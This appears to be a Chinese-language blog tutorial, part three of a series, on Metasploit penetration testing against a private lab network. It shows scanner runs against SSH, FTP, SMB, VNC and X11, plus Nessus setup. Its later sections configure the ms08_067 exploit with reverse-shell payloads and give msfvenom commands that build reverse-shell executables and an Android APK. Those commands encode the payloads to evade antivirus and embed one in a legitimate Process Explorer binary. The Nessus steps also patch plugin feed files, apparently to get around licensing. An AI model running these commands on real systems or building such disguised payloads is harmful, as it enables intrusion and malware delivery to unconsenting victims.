基于Metasploit的软件渗透测试(三)

本文涉及的产品
密钥管理服务KMS,1000个密钥,100个凭据,1个月
简介: 基于Metasploit的软件渗透测试(三)

利用辅助模块

辅助模块

查看目录
# cd /usr/share/metasploit-framework/modules/auxiliary
# ll
总用量 108
drwxr-xr-x 47 root root  4096  6月 24 17:25 admin
drwxr-xr-x  2 root root  4096  6月 24 20:36 analyze
drwxr-xr-x  2 root root  4096  6月 24 20:36 bnat
drwxr-xr-x  8 root root  4096  6月 24 17:25 client
drwxr-xr-x  4 root root  4096  6月 24 17:25 cloud
drwxr-xr-x  2 root root  4096  6月 24 20:36 crawler
drwxr-xr-x  2 root root  4096  6月 24 20:36 docx
drwxr-xr-x 27 root root  4096  6月 24 17:25 dos
-rwxr-xr-x  1 root root  1473  6月 16 23:59 example.py
-rw-r--r--  1 root root  1708  6月 16 23:59 example.rb
drwxr-xr-x  2 root root  4096  6月 24 20:36 fileformat
drwxr-xr-x 10 root root  4096  6月 24 17:25 fuzzers
drwxr-xr-x  2 root root 24576  6月 24 20:36 gather
drwxr-xr-x  2 root root  4096  6月 24 20:36 parser
drwxr-xr-x  3 root root  4096  6月 24 17:25 pdf
drwxr-xr-x 87 root root  4096  6月 24 17:25 scanner
drwxr-xr-x  4 root root  4096  6月 24 20:36 server
drwxr-xr-x  2 root root  4096  6月 24 20:36 sniffer
drwxr-xr-x  9 root root  4096  6月 24 17:25 spoof
drwxr-xr-x  5 root root  4096  6月 24 17:25 sqli
drwxr-xr-x  2 root root  4096  6月 24 20:36 voip
drwxr-xr-x  5 root root  4096  6月 24 17:25 vsploit


查看模块
msf6 > show auxiliary
Auxiliary
=========
   #     Name                                                                     Disclosure Date  Rank    Check  Description
   -     ----        ---------------  ----    -----  -----------
0     auxiliary/admin/2wire/xslt_password_reset   2007-08-15       normal  No     2Wire Cross-Site Request Forgery Password Reset Vulnerability
1     auxiliary/admin/android/google_play_store_uxss_xframe_rce     normal  No     Android Browser RCE Through Google Play Store XFO
2     auxiliary/admin/appletv/appletv_display_image                normal  No     Apple TV Image Remote Control
3     auxiliary/admin/appletv/appletv_display_video                normal  No     Apple TV Video Remote Control
4     auxiliary/admin/atg/atg_client                             normal  No     Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
5     auxiliary/admin/aws/aws_launch_instances                  normal  No     Launches Hosts in AWS
6     auxiliary/admin/backupexec/dump                         normal  No     Veritas Backup Exec Windows Remote File Access
7     auxiliary/admin/backupexec/registry                       normal  No     Veritas Backup Exec Server Registry Access
8     auxiliary/admin/chromecast/chromecast_reset               normal  No     Chromecast Factory Reset DoS
9     auxiliary/admin/chromecast/chromecast_youtube            normal  No     Chromecast YouTube Remote Control
10    auxiliary/admin/db2/db2rcmd       2004-03-04           normal  No     IBM DB2 db2rcmd.exe Command Execution Vulnerability
11    auxiliary/admin/dcerpc/cve_2020_1472_zerologon           normal  Yes    Netlogon Weak Cryptographic Authentication


使用辅助模块


msf6> use scanner/http/webdav_scanner


案例:搜索不当的SQL Server
msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/mssql/mssql_ping
msf6 auxiliary(scanner/mssql/mssql_ping) > options
Module options (auxiliary/scanner/mssql/mssql_ping):
Name Current Setting  Required  Description
   ---- ---------------  --------  -----------
PASSWORD          noThe password for the specified username
RHOSTS             yes   The target host(s), see https://github.com/
   rapid7/metasploit-framework/wiki/Using-Meta sploit
TDSENCRYPTION   false yes   Use TLS/SSL for TDS data "Force Encryption"
THREADS  1yes   The number of concurrent threads (max one p
   er host)
USERNAMEsanoThe username to authenticate as
USE_WINDOWS_AUTHENT  false  yes   Use windows authentification (requires DOMA
   IN option set)
msf6 auxiliary(scanner/mssql/mssql_ping) > set rhost 192.168.0.106
rhost => 192.168.0.106
msf6 auxiliary(scanner/mssql/mssql_ping) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/mssql/mssql_ping) > run
[*] 192.168.0.106:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


协议扫描

SSH扫描
msf6 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/ssh/ssh_version) > set threads 50
threads => 50
msf6 auxiliary(scanner/ssh/ssh_version) > run
[*] 192.168.0.1/24:22 - Scanned  41 of 256 hosts (16% complete)
[*] 192.168.0.1/24:22 - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.0.1/24:22 - Scanned  82 of 256 hosts (32% complete)
[+] 192.168.0.150:22  - SSH server version: SSH-2.0-OpenSSH_9.0p1 Debian-1 ( service.version=9.0p1 openssh.comment=Debian-1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:9.0p1 os.vendor=Debian os.family=Linux os.product=Linux os.cpe23=cpe:/o:debian:debian_linux:- service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.0.1/24:22 - Scanned 103 of 256 hosts (40% complete)
[*] 192.168.0.1/24:22 - Scanned 149 of 256 hosts (58% complete)
[*] 192.168.0.1/24:22 - Scanned 196 of 256 hosts (76% complete)
[*] 192.168.0.1/24:22 - Scanned 197 of 256 hosts (76% complete)
[*] 192.168.0.1/24:22 - Scanned 245 of 256 hosts (95% complete)
[*] 192.168.0.1/24:22 - Scanned 247 of 256 hosts (96% complete)
[*] 192.168.0.1/24:22 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


FTP扫描
msf6 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > set threads 50
threads => 50
msf6 auxiliary(scanner/ftp/ftp_version) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > set threads 50
threads => 50
msf6 auxiliary(scanner/ftp/ftp_version) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/ftp/ftp_version) > run
[*] 192.168.0.1/24:21     - Scanned  45 of 256 hosts (17% complete)
[*] 192.168.0.1/24:21     - Scanned  55 of 256 hosts (21% complete)
[*] 192.168.0.1/24:21     - Scanned  99 of 256 hosts (38% complete)
[+] 192.168.0.106:21      - FTP Banner: '220-FileZilla Server version 0.9.41 beta\x0d\x0a220-written by Tim Kosse (Tim.Kosse@gmx.de)\x0d\x0a220 Please visit http://sourceforge.net/projects/filezilla/\x0d\x0a'
[+] 192.168.0.150:21      - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a'
[*] 192.168.0.1/24:21     - Scanned 104 of 256 hosts (40% complete)
[+] 192.168.0.161:21      - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.0.1/24:21     - Scanned 144 of 256 hosts (56% complete)
[*] 192.168.0.1/24:21     - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.0.1/24:21     - Scanned 203 of 256 hosts (79% complete)
[*] 192.168.0.1/24:21     - Scanned 205 of 256 hosts (80% complete)
[*] 192.168.0.1/24:21     - Scanned 253 of 256 hosts (98% complete)
[*] 192.168.0.1/24:21     - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous 
msf6 auxiliary(scanner/ftp/anonymous) > set rhost 192.168.0.161
rhost => 192.168.0.150
msf6 auxiliary(scanner/ftp/anonymous) > run
[+] 192.168.0.161:21      - 192.168.0.161:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.0.161:21      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
结论:192.168.0.161的FTP允许匿名登录


SNMP扫描
msf6 auxiliary(scanner/ftp/anonymous) > use auxiliary/scanner/snmp/snmp_login
msf6 auxiliary(scanner/snmp/snmp_login) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/snmp/snmp_login) > set threads 50
threads => 50
msf6 auxiliary(scanner/snmp/snmp_login) > run
[*] Scanned  50 of 256 hosts (19% complete)
[*] Scanned  54 of 256 hosts (21% complete)
[*] Scanned 100 of 256 hosts (39% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 134 of 256 hosts (52% complete)
[*] Scanned 157 of 256 hosts (61% complete)
[*] Scanned 181 of 256 hosts (70% complete)
[*] Scanned 208 of 256 hosts (81% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


ARP 扫描
msf6 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > options
Module options (auxiliary/scanner/discovery/arp_sweep):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    5                yes       The number of seconds to wait for new data
msf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.0.1 appears to be up (UNKNOWN).
[+] 192.168.0.106 appears to be up (UNKNOWN).
[+] 192.168.0.150 appears to be up (VMware, Inc.).
[+] 192.168.0.151 appears to be up (UNKNOWN).
[+] 192.168.0.152 appears to be up (UNKNOWN).
[+] 192.168.0.158 appears to be up (UNKNOWN).
[+] 192.168.0.159 appears to be up (UNKNOWN).
[+] 192.168.0.161 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


HTTP服务扫描
msf6 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/http/http_version) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/http/http_version) > run
[+] 192.168.0.1:80
[*] Scanned  44 of 256 hosts (17% complete)
[*] Scanned  55 of 256 hosts (21% complete)
[*] Scanned  78 of 256 hosts (30% complete)
[+] 192.168.0.106:80 Microsoft-HTTPAPI/2.0
[*] Scanned 104 of 256 hosts (40% complete)
[+] 192.168.0.161:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
[*] Scanned 136 of 256 hosts (53% complete)
[*] Scanned 175 of 256 hosts (68% complete)
[*] Scanned 187 of 256 hosts (73% complete)
[*] Scanned 209 of 256 hosts (81% complete)
[*] Scanned 235 of 256 hosts (91% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


SMB扫描

SMB:SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。


SMB使用了NetBIOS的应用程序接口 (Application Program Interface,简称API)。另外,它是一个开放性的协议,允许了协议扩展——使得它变得更大而且复杂;大约有65个最上层的作业,而每个作业都超过120个函数,甚至Windows NT也没有全部支持到,最近微软又把 SMB 改名为 CIFS(Common Internet File System),并且加入了许多新的特色。


SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统


msf6 auxiliary(scanner/http/http_version) > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.0.1/24:       - Scanned  39 of 256 hosts (15% complete)
[*] 192.168.0.1/24:       - Scanned  60 of 256 hosts (23% complete)
[*] 192.168.0.151:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{d6d3c52d-ff47-48d3-aa4f-7ac8c44d7d96}) (authentication domain:LAPTOP-PH3NSDV2)
[*] 192.168.0.106:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{c4aea85c-fbd7-47a2-b5b5-f6ad41c48b6e}) (authentication domain:DESKTOP-9A8VFKB)
[*] 192.168.0.1/24:       - Scanned 104 of 256 hosts (40% complete)
[*] 192.168.0.158:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:4d 1h 5m 2s) (guid:{10a33533-6e55-452c-9c62-13561aafa6e1}) (authentication domain:WIN-2VEIIKHJ7M8)
[+] 192.168.0.158:445     -   Host is running Windows 7 Home Basic SP1 (build:7601) (name:WIN-2VEIIKHJ7M8) (workgroup:WORKGROUP)
[*] 192.168.0.161:445     - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.0.161:445     -   Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.0.1/24:       - Scanned 107 of 256 hosts (41% complete)
[*] 192.168.0.1/24:       - Scanned 159 of 256 hosts (62% complete)
[*] 192.168.0.1/24:       - Scanned 161 of 256 hosts (62% complete)
[*] 192.168.0.1/24:       - Scanned 203 of 256 hosts (79% complete)
[*] 192.168.0.1/24:       - Scanned 206 of 256 hosts (80% complete)
[*] 192.168.0.1/24:       - Scanned 254 of 256 hosts (99% complete)
[*] 192.168.0.1/24:       - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


漏洞扫描

Nexpose

# wget http://download2.rapid7.com/download/NeXpose-v4/NeXposeSetup-Linux64.bin
#chmod a+x NeXposeSetup-Linux64.bin
#./NeXposeSetup-Linux64.bin
#cd /opt/rapid7/nexpose/nsc
#./nsc


https://127.0.0.1:3780/ 登录页面出来后就ok了。


Nessus

https://blog.csdn.net/qq_51577576/article/details/123211031

1https://www.tenable.com/downloads/nessus

image.png


2dpkg -i Nessus-10.2.0-debian9_amd64.deb

3/bin/systemctl start nessusd.service

systemctl start nessusd.service

4https://127.0.0.1:8834/

5)关闭服务:systemctl stop nessusd.service

6)#gedit /opt/nessus/var/nessus/plugin_feed_info.inc
7)添加内容
PLUGIN_SET = "202201250216";
PLUGIN_FEED = "ProfessionalFeed (Direct)";
PLUGIN_FEED_TRANSPORT = "Tenable Network Security Lightning";
8)
# cd /opt/nessus/var/nessus/# mkdir plugins#cp /opt/nessus/var/nessus/plugin_feed_info.inc /opt/nessus/var/nessus/plugins/
9)更新
https://pan.baidu.com/s/11sV9Kk0mbzQkLcXqUKxO_g?pwd=462u
#/opt/nessus/sbin/nessuscli update all-2.0-20220209.tar.gz
msf6 > db_connect postgres:123456@127.0.0.1/msf
[*] Connected to Postgres data service: 127.0.0.1/msf
msf6 >db_status
[*] Connected to msf. Connection type: postgresql. Connection name: local_db_service.
msf6 > db_import /home/jerry/jerry_01sqgv.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.0.158
[*] Importing host 192.168.0.157
[*] Importing host 192.168.0.151
[*] Importing host 192.168.0.150
[*] Importing host 192.168.0.106
[*] Importing host 192.168.0.1
[*] Successfully imported /home/jerry/jerry_01sqgv.nessus
msf6 > hosts -c address,svcs,vulns
Hosts
=====
addresssvcs  vulns
-----------  -----
192.168.0.12 14
192.168.0.106  2376
192.168.0.150  6 46
192.168.0.151  4 28
192.168.0.155  3 2
192.168.0.157  4 29
192.168.0.158  1037


addressIP地址

svcs:探测到的服务数量

vulnsNessus发现到的漏洞个数

展示所有漏洞

msf6 > vulns

image.png


专门漏洞扫描

验证SMB登录
msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options
msf6 auxiliary(scanner/smb/smb_login) > set rhost 192.168.0.106-200
rhost => 192.168.0.106-200
msf6 auxiliary(scanner/smb/smb_login) > set smbuser root
smbuser => root
msf6 auxiliary(scanner/smb/smb_login) > set smbupass 123456
smbupass => 123456
msf6 auxiliary(scanner/smb/smb_login) > ser verbose false
[-] Unknown command: ser
msf6 auxiliary(scanner/smb/smb_login) > run


扫描开放的VNC空口令

VNC (Virtual Network Console)是虚拟网络控制台的缩写。它是一款优秀的远程控制工具软件,由著名的 AT&T 的欧洲研究实验室开发的。VNC 是在基于 UNIX Linux 操作系统的免费的开源软件,远程控制能力强大,高效实用,其性能可以和 Windows MAC 中的任何远程控制软件媲美。在 Linux 中,VNC 包括以下四个命令:vncservervncviewervncpasswd,和 vncconnect。大多数情况下用户只需要其中的两个命令:vncserver vncviewer

msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhost 192.168.0.106-200
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
threads => 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run


扫描开放的X11服务器

X11也叫做X Window系统,X Window系统 (X11X)是一种位图显示的视窗系统。它是在 Unix 和类Unix 操作系统,以及 OpenVMS 上建立图形用户界面的标准工具包和协议,并可用于几乎所有已有的现代操作系统。

msf6 auxiliary(scanner/vnc/vnc_none_auth) > use auxiliary/scanner/x11/open_x11
msf6 auxiliary(scanner/x11/open_x11) > set rhost 192.168.0.106/24
rhost => 192.168.0.106/24
msf6 auxiliary(scanner/x11/open_x11) > set threads 100
threads => 100
msf6 auxiliary(scanner/x11/open_x11) > run
[*] 192.168.0.106/24:6000 - Scanned  31 of 256 hosts (12% complete)
[*] 192.168.0.106/24:6000 - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.0.106/24:6000 - Scanned 102 of 256 hosts (39% complete)
[-] 192.168.0.157:6000- 192.168.0.157 Access Denied
[*] 192.168.0.106/24:6000 - Scanned 105 of 256 hosts (41% complete)
[*] 192.168.0.106/24:6000 - Scanned 200 of 256 hosts (78% complete)
[*] 192.168.0.106/24:6000 - Scanned 204 of 256 hosts (79% complete)
[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)
[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)
[*] 192.168.0.106/24:6000 - Scanned 254 of 256 hosts (99% complete)
[*] 192.168.0.106/24:6000 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


开启渗透之旅


msf6常用命令

msf6 >show exploits 显示所有的攻击模块

msf6 > show exploits
Exploits
========
# Name  Disclosure Date  Rank   Check  Description
- ---- ---------------  ----   -----  -----------
0 exploit/aix/local/ibstat_path  2013-09-24   excellent  Yesibstat $PATH Privilege Escalation
1 exploit/aix/local/xorg_x11_server 2018-10-25   great  YesXorg X11 Server Local Privilege Escalation
2 exploit/aix/rpc_cmsd_opcode21  2009-10-07   great  No AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
3 exploit/aix/rpc_ttdbserverd_realpath   2009-06-17   great  No ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
4 exploit/android/adb/adb_server_exec   2016-01-01   excellent  YesAndroid ADB Debug Server Remote Payload Execution
5 exploit/android/browser/samsung_knox_smdm_url   2014-11-12   excellent  No Samsung Galaxy KNOX Android Browser RCE
6 exploit/android/browser/stagefright_mp4_tx3g_64bit  2015-08-13   normal No Android Stagefright MP4 tx3g Integer Overflow


msf6 > show auxiliary
Auxiliary
=========
   # Name Disclosure Date  RankCheck  Description
   - ---- ---------------  ---------  -----------
0 auxiliary/admin/2wire/xslt_password_reset   2007-08-15normal  No 2Wire Cross-Site Request Forgery Password Reset Vulnerability
1 auxiliary/admin/android/google_play_store_uxss_xframe_rce normal  No Android Browser RCE Through Google Play Store XFO
2 auxiliary/admin/appletv/appletv_display_image normal  No Apple TV Image Remote Control
3 auxiliary/admin/appletv/appletv_display_video normal  No Apple TV Video Remote Control
4 auxiliary/admin/atg/atg_clientnormal  No Veeder-Root Automatic Tank Gauge (ATG) Administrative Client


msf6 > show options
msf6 > use auxiliary/scanner/x11/open_x11
msf6 auxiliary(scanner/x11/open_x11) > back
msf6 >search mysql

image.png

msf6 > search ms08_067
Matching Modules
================
#  Name Disclosure Date  Rank   Check  Description
-  ---- ---------------  ----   -----  -----------
0  exploit/windows/smb/ms08_067_netapi  2008-10-28   great  YesMS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi 
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting  Required  Description
---- ---------------  --------  -----------
RHOSTSyes   The target host(s), see https://github.com/rapid7/metas
   ploit-framework/wiki/Using-Metasploit
RPORT445  yes   The SMB service port (TCP)
SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
EXITFUNC  thread   yes   Exit technique (Accepted: '', seh, thread, process, no
ne)
LHOST 192.168.0.150yes   The listen address (an interface may be specified)
LPORT 4444 yes   The listen port
Exploit target:
Id  Name
--  ----
0   Automatic Targeting
msf>show payloads

image.png


显示某个模块下的payload

msf6 > use exploit/windows/smb/ms08_067_netapi
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show payloads

image.png


使用某个payload

msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf>show targets
msf6 exploit(windows/smb/ms08_067_netapi) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   79  Windows 2003 SP2 Russian (NX)
   80  Windows 2003 SP2 Swedish (NX)
   81  Windows 2003 SP2 Turkish (NX)


显示更详细的show targets内容

msf6 exploit(windows/smb/ms08_067_netapi) > info
Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2008-10-28
Provided by:
hdm
Brett Moore brett.moore@insomniasec.com
frank2
jduck
Available targets:
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   79  Windows 2003 SP2 Russian (NX)
   80  Windows 2003 SP2 Swedish (NX)
   81  Windows 2003 SP2 Turkish (NX)
Check supported:
  Yes
Basic options:
  Name Current Setting  Required  Description
  ---- ---------------  --------  -----------
  RHOSTSyes   The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT445  yes   The SMB service port (TCP)
  SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)
Payload information:
  Space: 408
  Avoid: 8 characters
Description:
  This module exploits a parsing flaw in the path canonicalization   code of NetAPI32.dll through the Server Service. This module is   capable of bypassing NX on some operating systems and service packs.
  The correct target must be used to prevent the Server Service (along   with a dozen others in the same process) from crashing. Windows XP   targets seem to handle multiple successful exploitation events, but   2003 targets will often crash or hang on subsequent attempts. This   is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.
References:
  https://nvd.nist.gov/vuln/detail/CVE-2008-4250  OSVDB (49243)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos


msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.105
lhost => 192.168.0.105
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name Current Setting  Required  Description
   ---- ---------------  --------  -----------
   RHOSTSyes   The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT445  yes   The SMB service port (TCP)
   SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   EXITFUNC  thread   yes   Exit technique (Accepted: '', seh, thread, process, none)
   LHOST 192.168.0.105yes   The listen address (an interface may be specified)
   LPORT 4444 yes   The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > unset lhost
Unsetting lhost...
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name Current Setting  Required  Description
   ---- ---------------  --------  -----------
   RHOSTSyes   The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT445  yes   The SMB service port (TCP)
   SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   EXITFUNC  thread   yes   Exit technique (Accepted: '', seh, thread, process, none)
   LHOST  yes   The listen address (an interface may be specified)
   LPORT 4444 yes   The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting


设置所有模块的lhost

msf6 exploit(windows/smb/ms08_067_netapi) > setg lhost 102.168.0.150
lhost => 102.168.0.150
msf6 exploit(windows/smb/ms08_067_netapi) > unsetg lhost


免杀技术

msfvenom

Options:  


-l, --list

<type>

列出[类型]的所有模块。类型包括:有效载荷、编码器、NOP、平台、ARCH、加密、格式等

-p, --payload

<payload>

要使用的有效负载(-list payloads  to list-list options for arguments)。为自定义指定“-”或STDIN

--list-options


列表——有效载荷的标准、高级和规避选项

-f, --format

<format>

输出格式(使用--列出要列出的格式)

-e, --encoder

<encoder>

要使用的编码器(使用-列出要列出的编码器)

--service-name

<value>

生成服务二进制文件时要使用的服务名称

--sec-name

<value>

生成大型Windows二进制文件时要使用的新节名称。默认值:随机4字符alpha字符串

--smallest


使用所有可用编码器生成尽可能最小的有效载荷

--encrypt

<value>

应用于外壳代码的加密或编码类型(使用--list encrypt  to list

--encrypt-key

<value>

用于加密的密钥

--encrypt-iv

<value>

加密的初始化向量

-a, --arch

<arch>

用于--有效负载和--编码器的架构(使用--列出要列出的ARCH

--platform

<platform>

有效负载的平台(使用列出要列出的平台)

-o, --out

<path>

将有效负载保存到文件中

-b, --bad-chars

<list>

要避免的字符示例: '\x00\xff'

-n, --nopsled

<length>

在有效负载上预先添加一个[length]大小的nopled

--pad-nops


使用-n<length>指定的nopled size作为总有效负载大小,自动预加数量的noplednops减去有效负载长度)

-s, --space

<length>

产生的有效载荷的最大大小

--encoder-space

<length>

编码有效负载的最大大小(默认为-s值)

-i,  --iterations

<count>

对有效负载进行编码的次数

-c, --add-code

<path>

指定要包括的其他win32外壳代码文件

-x, --template

<path>

指定要用作模板的自定义可执行文件

-k, --keep


保留--模板行为,并将负载作为新线程注入

-v, --var-name

<value>

指定用于某些输出格式的自定义变量名

-t, --timeout

<second>

STDIN读取有效负载时等待的秒数(默认为300表示禁用)

-h, --help


显示此消息

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=9999 R > test.apk

躲避杀毒软件的监测

使用MSF编码器

 # msfvenom -l encoders
Framework Encoders [--encoder]
======================================
    x86/shikata_ga_nai       excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit      manual     Single Static Bit
    x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic         normal     Dynamic key XOR Encodermsfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe


自定义可自行文件模板

wget http://download.sysinternals.com/files/ProcessExplorer.zip(也可以从国内网站上取)

msfvenom -a x86 --platform Windows -x ProcessExplorer/procexp.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload1.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
